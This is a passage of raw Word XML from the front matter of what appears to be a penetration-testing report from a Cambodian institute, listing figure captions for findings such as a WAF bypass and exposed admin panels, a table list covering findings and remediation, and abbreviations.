                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Burp Suite — Cloudflare WAF bypass confirmation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Rate limit bypass — fifty/fifty tokens, zero rate-limit responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>JWT endpoint confirmed live as of eleven June 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WHM admin panel publicly accessible at port 2087</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MikroTik WebFig login with admin pre-filled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL connection from public IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Figure 4.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Attack chain diagram — four confirmed attack vectors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>LIST OF TABLES</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4535"/>
        <w:gridCol w:w="4535"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Table 4.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Testing tools used in this engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Table 5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Complete findings register — twenty vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Table 5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Severity distribution and CVSS score summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Table 5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Remediation priority roadmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>LIST OF ABBREVIATIONS</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4535"/>
        <w:gridCol w:w="4535"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Application Programming Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Content Delivery Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CORS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cross-Origin Resource Sharing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Content Security Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Common Vulnerability Scoring System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Common Weakness Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DMARC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Domain-based Message Authentication, Reporting and Conformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Domain Name System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hypertext Transfer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hypertext Transfer Protocol Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ITC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Institution of Technology of Cambodia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>JSON Web Token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>NIST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>National Institute of Standards and Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>OSINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Open Source Intelligence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Open Web Application Security Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Simple Mail Transfer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SPF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Sender Policy Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Structured Query Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
